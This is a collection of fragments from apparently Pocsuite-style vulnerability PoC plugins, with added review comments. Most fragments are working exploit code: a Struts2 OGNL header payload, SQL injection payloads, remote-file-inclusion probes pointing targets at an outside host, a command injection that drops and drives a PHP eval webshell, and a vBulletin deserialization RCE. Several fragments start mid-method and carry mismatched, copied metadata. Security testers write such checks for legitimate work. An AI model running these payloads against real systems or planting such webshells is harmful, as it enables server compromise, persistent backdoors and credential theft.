# NOTE(review): this excerpt starts inside a class body; the class header is
# not visible here, so the members are shown without their class indentation.
appName = 'struts'
appVersion = 'struts'
appPowerLink = 'struts'
samples = ['']

def _attack(self):
    '''Attack mode: no separate behaviour, it delegates to _verify().'''
    return self._verify()

def _verify(self):
    '''Verify mode: POST with a crafted Content-type header and look for an echoed marker.

    A finding is recorded only when the response is truthy, has non-empty
    text, status 200, and the text contains the marker 'bey0nd'.
    '''
    result = {}
    # NOTE(review): the literal below contains "[email protected]" twice. That looks
    # like an e-mail-obfuscation artifact of the page this listing was taken
    # from, so the value shown is probably not the author's original string.
    # Defender's view: a Content-type request header beginning with "%{" is
    # not a media type; logging or rejecting such headers flags this probe.
    # The assignment mutates self.headers, so the value stays set afterwards.
    self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}"
    resp = req.post(self.url,headers = self.headers)
    if resp and resp.text and resp.status_code == 200:
        if "bey0nd" in resp.text:
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = "bey0nd"
    return self.parse_output(result)

def parse_output(self, result):
    '''Wrap result in an Output: success() when it is non-empty, fail('Failed') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Failed')
    return output

# Module level: hands the PoC class to register().
register(Struts45POC)
# NOTE(review): this excerpt starts inside a method body; the enclosing def
# (and its class) are not visible, so the statements are shown unindented.
result = {}
url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
# The form body is assembled from three pieces with the payload in the middle.
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
# NOTE(review): this check submits a form (form_submit=ok), so it may leave a
# record behind on the tested system; no cleanup is visible in this excerpt.
req.post(vul_url, data=post_data, headers=headers)
# The address page is then fetched and searched for the marker string;
# presumably that string is the digest the injected md5() call yields -- TODO confirm.
res = req.get(url)
if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
    result['VerifyInfo'] = {}
    result['VerifyInfo']['URL'] = vul_url
    result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)

def parse_attack(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output

# Module level: hands the PoC class to register().
register(ShopNCPOC)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check lm_absolute_path on mod_eventcal.php for remote file inclusion.

    The request sets the parameter to an external URL; the target is
    reported when the marker string occurs in the response body.
    '''
    probe = '%s/eventcal/mod_eventcal.php?lm_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    body = req.get(probe).content
    findings = {}
    # The marker is matched verbatim; presumably it is what the external file
    # yields once the target includes it -- TODO confirm.
    if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # NOTE(review): no timeout is passed to req.get(), and a miss can also
    # mean the external host was unreachable, not that the parameter is safe.
    # Defender's view: the probe shows up in access logs as a request whose
    # lm_absolute_path value starts with http://.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(Limbo_CMS_Module_event_Remote_File_Include)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check mosConfig_absolute_path on config.kochsuite.php for remote file inclusion.

    Reports the target when the response to a request carrying an external
    URL in that parameter contains the marker string.
    '''
    target = '%s/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: PHP's allow_url_include=Off stops include() from
    # fetching URLs; the probe itself is visible as "=http://" in the query.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(Joomla_Kochsuite_Component_Remote_File_Include)
phpinfo can be via. that will be leak server's information. '''
# NOTE(review): the line above is the tail of a triple-quoted string whose
# start (and the class header) are outside this excerpt.
# Sample sites used to exercise the check.
samples = ['']

def _attack(self):
    '''Fetch self.url with a referer header and pass the response to parse_attack().'''
    response = req.get(self.url, headers={"referer": self.url}, timeout=10)
    # NOTE(review): the response object itself is handed over, so success or
    # failure rests on its truthiness, not on the 'PHP Version' test that
    # _verify() applies -- confirm this is intended.
    return self.parse_attack(response)

def _verify(self):
    '''Report the URL when it answers 200 and the body contains 'PHP Version'.'''
    result = {}
    head = { 'referer':self.url }
    respon = req.get(self.url, headers=head, timeout=10)
    # Defender's view: a publicly reachable phpinfo page discloses server
    # configuration; remove it or restrict access in production.
    if respon.status_code == 200 and 'PHP Version' in respon.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = self.url
    return self.parse_attack(result)

def parse_attack(self, result):
    '''Wrap result in an Output: success() when truthy, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet Nothing returned')
    return output

# Module level: hands the PoC class to register().
register(PhpinfoPOC)
# NOTE(review): this excerpt starts inside a method body; the enclosing def
# and the code that produces match_result are not visible.
if match_result:
    result['AdminInfo'] = {}
    # Each match has its first character dropped before it is stored.
    result['AdminInfo']['Username'] = match_result[0][1:]
    result['AdminInfo']['Password'] = match_result[1][1:]
return self.parse_attack(result)

def _verify(self):
    '''Request akcms_keyword.php with the payload and look for a marker string in the body.'''
    result = {}
    vul_url = urlparse.urljoin(self.url, '/akcms_keyword.php?sid=11111')
    payload = "'md5(0x2333333),1,1,1) -- a"
    # NOTE(review): headers is assigned but never used in this method.
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    res = req.get(vul_url.join(payload))
    # Presumably the marker is the digest the md5() call in the payload
    # yields -- TODO confirm.
    if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
        result['VerifyInfo'] = {}
        result['VerifyInfo']['URL'] = vul_url
        result['VerifyInfo']['Payload'] = payload
    return self.parse_attack(result)

def parse_attack(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output

# NOTE(review): the registered name is ShopNCPOC while the probed path is
# akcms_keyword.php -- the class name may be left over from another PoC.
register(ShopNCPOC)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check the `l` parameter of /admin/install.php for remote file inclusion.

    The request sets the parameter to an external URL; the target is
    reported when the marker string occurs in the response body.
    '''
    probe = '%s/admin/install.php?l=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    body = req.get(probe).content
    findings = {}
    # The marker is matched verbatim; presumably it is what the external file
    # yields once the target includes it -- TODO confirm.
    if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # NOTE(review): no timeout is passed to req.get(), and a miss can also
    # mean the external host was unreachable, not that the parameter is safe.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(McNews_Remote_File_Include)
# NOTE(review): methods of a class whose header is outside this excerpt.
def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check path_prefix on /code/error.php for remote file inclusion.

    Reports the target when the response to a request carrying an external
    URL in that parameter contains the marker string.
    '''
    target = '%s/code/error.php?path_prefix=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: the probe is visible in access logs as a path_prefix
    # value that starts with http://.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(GrayCMS_Remote_File_Include)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check the ROOT parameter of city.get.php for remote file inclusion.

    The request sets the parameter to an external URL; the target is
    reported when the marker string occurs in the response body.
    '''
    probe = '%s/modules/city.get/city.get.php?ROOT=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    body = req.get(probe).content
    findings = {}
    # The marker is matched verbatim; presumably it is what the external file
    # yields once the target includes it -- TODO confirm.
    if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # NOTE(review): no timeout is passed to req.get(), and a miss can also
    # mean the external host was unreachable, not that the parameter is safe.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(Insky_CMS_Remote_File_Include)
# NOTE(review): methods of a class whose header is outside this excerpt. The
# nesting below was reconstructed from a collapsed line -- confirm against the
# original file, in particular where the two clean-up requests sit.
def _attack(self):
    '''Store a uniquely tagged script string through one page and look for the tag on another.

    Runs only when self.common() returns a truthy value, which is then used
    as the sessionid query parameter of every request.
    '''
    result = {}
    sessionid = self.common()
    if sessionid:
        # A fresh token per run makes the later match specific to this request.
        token = hashlib.new('md5', randomStr()).hexdigest()
        payload = '<script>alert("%s")</script>' % token
        req.get(self.url + "/escform.esp?sessionid=" + sessionid + "&formid=131&opmsg=" + payload).content
        response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=257").content
        # The token appearing in the second page means the submitted value was
        # stored and rendered back.
        if token in response:
            result['VerifyInfo'] = {}
            result['XSSInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['XSSInfo']['Payload'] = payload
        # Delete the message (original comment was mojibake; translation inferred).
        response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=259").content
        # Log out (original comment was mojibake; translation inferred).
        response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=11").content
    return self.parse_result(result)

def parse_result(self, result):
    '''Wrap result in an Output: success() when non-empty, fail('failed') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('failed')
    return output

# NOTE(review): the registered name mentions privilege escalation while the
# result keys describe an XSS finding -- confirm which is intended.
register(ESC_Data_Controller_Privilege_Escalation)
# NOTE(review): this excerpt starts in the middle of a dict literal inside a
# method body; the opening of the dict and the enclosing def are not visible.
'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat("
                      "floor(rand(0)*2),(select md5(233)))a from "
                      "information_schema.tables group by a)b),"
                      "'','','','1','127.0.0.1','2') #"
}
# Send the POST request with requests.
response = req.post(target, data=post_data, timeout=10)
content = response.content
# e165421110ba03099a1c0393373c5b43 is the value of md5(233).
if 'e165421110ba03099a1c0393373c5b43' in content:
    result = {'VerifyInfo': {}}
    result['VerifyInfo']['URL'] = target
# NOTE(review): result is assigned only in the branch above within this
# excerpt; whether it is initialised earlier cannot be seen here.
return self.parse_result(result)

def _attack(self):
    '''Attack mode: delegates to _verify().'''
    return self._verify()

def parse_result(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet Nothing returned')
    return output

# Module level: hands the PoC class to register().
register(CmsEasyPoC)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check the `av` parameter of /portfolio/msg/view.php for remote file inclusion.

    Reports the target when the response to a request carrying an external
    URL in that parameter contains the marker string.
    '''
    target = '%s/portfolio/msg/view.php?av=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: PHP's allow_url_include=Off stops include() from
    # fetching URLs; the probe itself is visible as "=http://" in the query.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(Cyberfolio_Remote_File_Include)
# NOTE(review): this excerpt starts in the middle of a dict value inside a
# method body; the dict key, its opening brace and the enclosing def are not
# visible.
"1',(SELECT 1 FROM (select count(*),concat("
"floor(rand(0)*2),(select md5(233)))a from "
"information_schema.tables group by a)b),"
"'','','','1','127.0.0.1','2') #"
}
# Send the POST request with requests.
response = req.post(target, data=post_data, timeout=10)
content = response.content
# e165421110ba03099a1c0393373c5b43 is the value of md5(233).
if 'e165421110ba03099a1c0393373c5b43' in content:
    result = {'VerifyInfo': {}}
    result['VerifyInfo']['URL'] = target
# NOTE(review): result is assigned only in the branch above within this
# excerpt; whether it is initialised earlier cannot be seen here.
return self.parse_result(result)

def _attack(self):
    '''Attack mode: delegates to _verify().'''
    return self._verify()

def parse_result(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet Nothing returned')
    return output

# Module level: hands the PoC class to register().
register(CmsEasyPoC)
# NOTE(review): this excerpt starts inside a method body; the enclosing def
# (apparently _attack, since _verify below calls it) is not visible.
img_url = self.upload_image()
payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23'
sess = req.Session()
sess.headers.update(self.headers)
# The size segment '300x300' of the uploaded image URL is swapped for the payload.
sess.get(img_url.replace('300x300', payload))
# The dropped file is then asked to echo a reversed string; the reversed form
# in the response is the success criterion.
resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content
if 'cfsqingfd' in resp:
    result['ShellInfo'] = {}
    result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url
    result['ShellInfo']['Content'] = 'e'
# NOTE(review): nothing in this excerpt removes Uan1wS.php afterwards, so a
# run leaves that file on the tested system.
# Defender's view: indicators are an image-size path segment containing "||"
# and a new Uan1wS.php appearing in the web root.
return self.parse_attack(result)

def _verify(self):
    '''Verify mode: delegates to _attack().

    NOTE(review): because of the delegation, verify mode performs the same
    file-writing steps as attack mode; it is not a read-only check.
    '''
    return self._attack()

def parse_attack(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Internet nothing returned')
    return output

# Module level: hands the PoC class to register().
register(TestPOC)
# NOTE(review): this excerpt starts inside a method body, apparently inside a
# loop over raw[...]; the loop header and the enclosing def are not visible,
# so the statements are shown flattened to one level.
# NOTE(review): .group(1) raises AttributeError when the pattern does not
# match, because re.search() then returns None.
award = re.search('</i>[\s\S]+?([\d\.]+kB)[\s\S]+?</td>' , raw[amount_of_raws]).group(1)
total = total + 1
# Python 2 print statements: dump one record per entry.
print '\n'
print str(total) + '.'
print author
# NOTE(review): `time` and `type` are local variables here and shadow the
# module / builtin of the same name.
print time
print type
print vid
print title
print award
print '\n'
# A result is recorded unconditionally in the visible part of the method.
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
print 'total:' , total
return self.parse_attack(result)

def parse_attack(self, result):
    '''Wrap result in an Output: success() when non-empty, fail('failed') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('failed')
    return output

# Module level: hands the class to register().
register(showSeebugSubmission)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Database Found'
# desc, translated: Angelo-Emlak keeps sensitive information under the web
# root without sufficient access control, so a remote attacker can download
# the database by requesting veribaze/angelo.mdb directly.
desc = 'Angelo-Emlak在web根目录下保存敏感信息,但缺乏足够的访问控制,远程攻击者可以通过直接向veribaze/angelo.mdb发出请求,下载数据库。'
samples = ['http://burdurdaemlak.com']


def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check whether /veribaze/angelo.mdb can be fetched without authentication.

    The target is reported when the response body contains the string
    'Standard Jet DB'.
    '''
    db_url = '%s/veribaze/angelo.mdb' % self.url
    body = req.get(db_url).content
    findings = {}
    # NOTE(review): the whole response body is loaded into memory and no
    # timeout is passed to req.get().
    if re.search('Standard Jet DB', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # Defender's view: keep database files outside the web root or deny
    # direct requests for *.mdb at the web server.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(Angelo_emlak_Database_Found)
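# NOTE(review): methods of a class whose header is outside this excerpt.
def _verify(self):
    '''Verify mode: check whether port 6379 answers an INFO request without authentication.

    Sends the bytes "*1\\r\\n$4\\r\\ninfo\\r\\n" to the host derived from
    self.url and records a finding when the first 1024 bytes of the reply
    contain 'redis_version'.

    Connection errors and timeouts propagate to the caller, as before.
    Defender's view: a finding means the service is reachable and replies
    without credentials; Redis' `requirepass`, `bind` and `protected-mode`
    settings, plus network filtering of the port, are the usual controls.
    '''
    import socket
    result = {}
    payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
    # The default timeout only applies to sockets created after this call, so
    # it has to be set before socket.socket() for the 5 s limit to take effect.
    socket.setdefaulttimeout(5)
    host = url2ip(self.url)
    port = 6379
    s = socket.socket()
    try:
        s.connect((host, port))
        s.send(payload)
        recvdata = s.recv(1024)
        if recvdata and 'redis_version' in recvdata:
            result['FileInfo'] = {}
            result['FileInfo']['Filename'] = "redis-unauth"
    finally:
        # Release the socket even when connect/send/recv raises.
        s.close()
    return self.parse_output(result)

def parse_output(self, result):
    '''Wrap result in an Output: success() when non-empty, fail('Failed') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Failed')
    return output

# Module level: hands the PoC class to register().
register(RedisunauthPOC)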
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check the `base` parameter of /pop.php for remote file inclusion.

    The request sets the parameter to an external URL; the target is
    reported when the marker string occurs in the response body.
    '''
    probe = '%s/pop.php?base=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    body = req.get(probe).content
    findings = {}
    # The marker is matched verbatim; presumably it is what the external file
    # yields once the target includes it -- TODO confirm.
    if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # NOTE(review): no timeout is passed to req.get(), and a miss can also
    # mean the external host was unreachable, not that the parameter is safe.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(MyABraCaDaWeb_Remote_File_Include)
# NOTE(review): methods of a class whose header is outside this excerpt.
def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check the `view` parameter of /epal/index.php for remote file inclusion.

    Reports the target when the response to a request carrying an external
    URL in that parameter contains the marker string.
    '''
    target = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: the probe is visible in access logs as a `view` value
    # that starts with http://.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(AlstraSoft_EPay_Pro_Remote_File_Include)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
# NOTE(review): desc names phpBB PlusXL and constants.php, while the class
# name and the probed path refer to JASmine News and index.php -- the text
# looks copied from another PoC; confirm.
desc = 'phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit'
samples = ['']


def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check the `section` parameter of /index.php for remote file inclusion.

    The request sets the parameter to an external URL; the target is
    reported when the marker string occurs in the response body.
    '''
    probe = '%s/index.php?section=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    body = req.get(probe).content
    findings = {}
    # The marker is matched verbatim; presumably it is what the external file
    # yields once the target includes it -- TODO confirm.
    if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # NOTE(review): no timeout is passed to req.get(), and a miss can also
    # mean the external host was unreachable, not that the parameter is safe.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(JASmine_News_Remote_File_Include)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Delegate to _verify(); there is no separate attack behaviour.'''
    return self._verify()


def _verify(self):
    '''Check CONFIG[BASE_PATH] on /admin/autoprompter.php for remote file inclusion.

    Reports the target when the response to the request below contains the
    marker string.
    '''
    target = '%s/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://tool.scanv.com/wsl/php_verify.txt?]' % self.url
    page = req.get(target).content
    # Marker matched verbatim; presumably produced by the included external
    # file -- TODO confirm. The verdict depends on that third-party host.
    hit = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', page)
    result = {'VerifyInfo': {'URL': self.url}} if hit else {}
    # Defender's view: PHP's allow_url_include=Off stops include() from
    # fetching URLs, and an empty result here is not proof of a safe target.
    return self.parse_attack(result)


def parse_attack(self, result):
    '''Build the Output for this run: success on a non-empty result, fail otherwise.'''
    outcome = Output(self)
    if result:
        outcome.success(result)
        return outcome
    outcome.fail('failed')
    return outcome


register(interact_Remote_File_Include)
# NOTE(review): this excerpt starts inside a class body; the class header is
# not visible here, so the members are shown without their class indentation.
appPowerLink = 'axublog'
samples = ['']

def _attack(self):
    '''Attack mode: no separate behaviour, it delegates to _verify().'''
    return self._verify()

def _verify(self):
    '''Verify mode: request hit.php with a UNION query in `id` and look for md5(1) in the reply.

    A finding is recorded only when the response is truthy, has non-empty
    text, status 200, and the text contains the marker digest.
    '''
    result = {}
    payurl = "hit.php?g=arthit&id=-1 +%55NION+ALL+%53ELECT+1,2,3,4,5,6,md5(1),8,9,10,11,12 from axublog_adusers"
    resp = req.get(self.url + payurl)
    # NOTE(review): leftover debug output (Python 2 print statement); it dumps
    # the full response text on every run.
    print resp.text
    if resp and resp.text and resp.status_code == 200:
        # c4ca4238a0b923820dcc509a6f75849b is the MD5 digest of "1", i.e. the
        # value the md5(1) column in the query would produce.
        if "c4ca4238a0b923820dcc509a6f75849b" in resp.text:
            result['AdminInfo'] = {}
            # Only a masked placeholder is stored, not data from the response.
            result['AdminInfo'][ 'Password'] = "******"
    # Defender's view: binding `id` as an integer in a parameterized query
    # removes the condition this check looks for.
    return self.parse_output(result)

def parse_output(self, result):
    '''Wrap result in an Output: success() when non-empty, fail('Failed') otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail('Failed')
    return output

# Module level: hands the PoC class to register().
register(AxublogPOC)
# Class-level metadata; the class header lies outside this excerpt.
vulType = 'Remote File Inclusion'
desc = ''
samples = ['']


def _attack(self):
    '''Attack mode is the same as verify mode for this check.'''
    return self._verify()


def _verify(self):
    '''Check the file_path parameter of /index.php for remote file inclusion.

    The request sets the parameter to an external URL; the target is
    reported when the marker string occurs in the response body.
    '''
    probe = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
    body = req.get(probe).content
    findings = {}
    # The marker is matched verbatim; presumably it is what the external file
    # yields once the target includes it -- TODO confirm.
    if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', body):
        findings['VerifyInfo'] = {'URL': self.url}
    # NOTE(review): no timeout is passed to req.get(), and a miss can also
    # mean the external host was unreachable, not that the parameter is safe.
    return self.parse_attack(findings)


def parse_attack(self, result):
    '''Turn the findings dict into an Output (success if non-empty, else fail).'''
    report = Output(self)
    if not result:
        report.fail('failed')
    else:
        report.success(result)
    return report


register(dotWidget_CMS_Remote_File_Include)
# NOTE(review): this excerpt starts inside a method body; the enclosing def
# and the definitions of shell_url / verify_payload are not visible.
resp1 = req.post(shell_url, data=verify_payload)
if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content:
    result['shellURL'] = shell_url + " password: a"
    return self.parse_attack(result)
return self.parse_attack(result)

def _verify(self):
    '''Request decodeArguments with a serialized object and look for md5(1) in the reply.'''
    result = {}
    # URL-encoded serialized object; it names print md5(1) as the value to be
    # evaluated, which is what the marker below corresponds to.
    payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A13%3A%22print+md5%281%29%3B%22%3B%7D"
    vulurl = urlparse.urljoin( self.url, '/ajax/api/hook/decodeArguments?arguments=%s' % payload)
    # NOTE(review): leftover debug output (Python 2 print statement).
    print vulurl
    resp = req.get(vulurl)
    # c4ca4238a0b923820dcc509a6f75849b is the MD5 digest of "1".
    if resp.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in resp.content:
        result["VerifyInfo"] = {}
        result["VerifyInfo"]['URL'] = vulurl
        result["VerifyInfo"]["Payload"] = payload
    # Defender's view: requests to this path whose `arguments` value begins
    # with a serialized object ("O%3A") are the indicator to log or block.
    return self.parse_attack(result)

def parse_attack(self, result):
    '''Wrap result in an Output: success() when non-empty, fail() with a fixed message otherwise.'''
    output = Output(self)
    if result:
        output.success(result)
    else:
        output.fail("Internet nothing returned")
    return output

# Module level: hands the PoC class to register().
register(vB5_RCE)
class EduwindPOC(POCBase):
    # NOTE(review): the metadata is inconsistent -- `name` mentions shopnc,
    # appPowerLink points at phpcms.cn, appName says Eduwind, and desc
    # describes an SQL injection in the phpcms 2008 advertisement module.
    # It looks copied between PoCs; confirm which product this class targets.
    vulID = '90650' # ssvid
    version = '1'
    author = ['Dubuqingfeng']
    vulDate = '2016-01-13'
    createDate = '2016-02-03'
    updateDate = '2016-02-03'
    references = ['http://www.sebug.net/vuldb/ssvid-90650']
    name = '_90650_shopnc_2008_place_sql_inj_PoC'
    appPowerLink = 'http://www.phpcms.cn'
    appName = 'Eduwind'
    appVersion = '2008'
    vulType = 'SQL Injection'
    # desc, translated: the advertisement module of phpcms 2008 filters a
    # parameter insufficiently, which leads to SQL injection; with error
    # display enabled on the server it can be used directly, otherwise time-
    # and error-based blind injection applies.
    # (Line breaks inside the literal were lost when the listing was collapsed.)
    desc = ''' phpcms 2008 中广告模块,存在参数过滤不严, 导致了sql注入漏洞,如果对方服务器开启了错误显示,可直接利用, 如果关闭了错误显示,可以采用基于时间和错误的盲注 '''
    samples = ['http://10.1.200.28/']

    @require_header('cookie')
    def _attack(self):
        '''Submit the address form with an injected true_name[] value and parse the address page.

        Values prefixed with '~' are collected from the follow-up page; the
        first two are stored as Username and Password.
        '''
        result = {}
